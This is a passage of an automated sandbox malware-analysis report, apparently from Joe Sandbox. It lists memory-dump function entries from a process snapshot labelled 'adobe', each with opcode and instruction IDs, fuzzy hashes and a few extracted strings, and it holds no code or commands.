                                                        • Opcode Fuzzy Hash: 99d18e0d93a81331b235c8e1c1052eca638fdbf895167e1c98492d884053db00
                                                        • Instruction Fuzzy Hash: 12018131B104114BDB6497BDD450B6FA6DBDBC9720F10883AE70ACB785ED62DC424395
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ffcbfb4ecce68804417dafff7b89c62922ec68d38c75474fb081d238ae26342
                                                        • Instruction ID: df3dfc87bc57b8d89d6dd80301fceced3060bc8d8a477c69ef8546a3c46a62a8
                                                        • Opcode Fuzzy Hash: 6ffcbfb4ecce68804417dafff7b89c62922ec68d38c75474fb081d238ae26342
                                                        • Instruction Fuzzy Hash: 3B018135F200114BDB6497BDE85072E67DADBC9620F14842AE20ACB354DE62DC424785
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 32a119ea71c6b500bac72864f280d9aefe7cbad214ad99c83f4fbb3a143a97d7
                                                        • Instruction ID: e1136a87519e96a5ee8e77affe494850cfcdfa1175a9ae2932a37875c980553f
                                                        • Opcode Fuzzy Hash: 32a119ea71c6b500bac72864f280d9aefe7cbad214ad99c83f4fbb3a143a97d7
                                                        • Instruction Fuzzy Hash: 07013135B20515DBDB64E7B9E450B2E77D6EB89710F108529E20ECB354DE21EC4287C5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bcba1a3bc966c017d7159dd591bc390e423373f6eaf8fe19bde95a304e4595a4
                                                        • Instruction ID: efb362d2381d3eaffd7868ee092154704f0e5a81373ecd4e9a75a57343892832
                                                        • Opcode Fuzzy Hash: bcba1a3bc966c017d7159dd591bc390e423373f6eaf8fe19bde95a304e4595a4
                                                        • Instruction Fuzzy Hash: 97E09270E282496BDB60DBB0D959B5A7B6DD702204F1084A9E904DB202E176DE018791
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-2049195972
                                                        • Opcode ID: b9455c2f9db693ecc95412324937b8b12f742a5a74cdcb03958ebb53e5205413
                                                        • Instruction ID: 597e64f56b968f8d973043f8dc6cef3bed1456c4696c66c40344c93127781ce2
                                                        • Opcode Fuzzy Hash: b9455c2f9db693ecc95412324937b8b12f742a5a74cdcb03958ebb53e5205413
                                                        • Instruction Fuzzy Hash: 10123D34E11219CFDB64DF65D954AAEBBB2FF89300F208569D50AAB354DB309D81CF81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-1110479544
                                                        • Opcode ID: bbb258e2a1a7e21d6fcebf5adf067e21436f7dda304bfcaec88a848565b29454
                                                        • Instruction ID: ef79647a1e71db10d913aa1b5e677f3c3bda9aafcf8faa47410bfa7175ed4551
                                                        • Opcode Fuzzy Hash: bbb258e2a1a7e21d6fcebf5adf067e21436f7dda304bfcaec88a848565b29454
                                                        • Instruction Fuzzy Hash: CE918F34A20209DFEBA4DFA5D69476E7BF3BF84300F208529D50A9B394DB749D41CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .5}q$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-1622854337
                                                        • Opcode ID: c3b0087e4744234e575a53c00b85bf23e44221bd17db2b29a01330ec1d06d76a
                                                        • Instruction ID: fe2e5673aaac296a56dd32405390c39f18a1b523b9f3744481cd0fc31845781d
                                                        • Opcode Fuzzy Hash: c3b0087e4744234e575a53c00b85bf23e44221bd17db2b29a01330ec1d06d76a
                                                        • Instruction Fuzzy Hash: 2BF13A34A10208CFDB55EFA9D554A6EBBB3FF84304F248568D5059B3A8DB35AD42CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq
                                                        • API String ID: 0-812946093
                                                        • Opcode ID: 4b319dc0ac640da8d22cc0281427781f55a1d10d7ff8669ad7d8dde3638b4e9b
                                                        • Instruction ID: b44b025728b190e0b016bd3771920081731014211e27a4eba840fe4ef8a33caa
                                                        • Opcode Fuzzy Hash: 4b319dc0ac640da8d22cc0281427781f55a1d10d7ff8669ad7d8dde3638b4e9b
                                                        • Instruction Fuzzy Hash: 23B12934A20209CFDB54EB69D5507AEB7B2EF84304F24846DD506EB399DB74EC82CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq
                                                        • API String ID: 0-812946093
                                                        • Opcode ID: ef14e322879821d2c5603f9a42e53eb95362ca98a67163e45a830d8069cb79a6
                                                        • Instruction ID: 178f053046dfda941ece055442429acd2f2b599f0434d5abc168396e694f516f
                                                        • Opcode Fuzzy Hash: ef14e322879821d2c5603f9a42e53eb95362ca98a67163e45a830d8069cb79a6
                                                        • Instruction Fuzzy Hash: 63519334E21205CFDFA5DBA4D5806AEB7B2FB88311F248529E91ADB345DB31DC42CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LReq$LReq$$eq$$eq
                                                        • API String ID: 0-731573373
                                                        • Opcode ID: 35d86343c05bb08d3e385860b7b99a168b25213281df4c4df541b740e1a7d70c
                                                        • Instruction ID: 09db9fbd4af36218d5744852858f5c0291ea72f2f0f5c9a7524f0b481520a37b
                                                        • Opcode Fuzzy Hash: 35d86343c05bb08d3e385860b7b99a168b25213281df4c4df541b740e1a7d70c
                                                        • Instruction Fuzzy Hash: 5A51AE30B102019FDB54EB29D990A6AB7F6FB88304F1485ADE516DF3A9DB31EC41CB81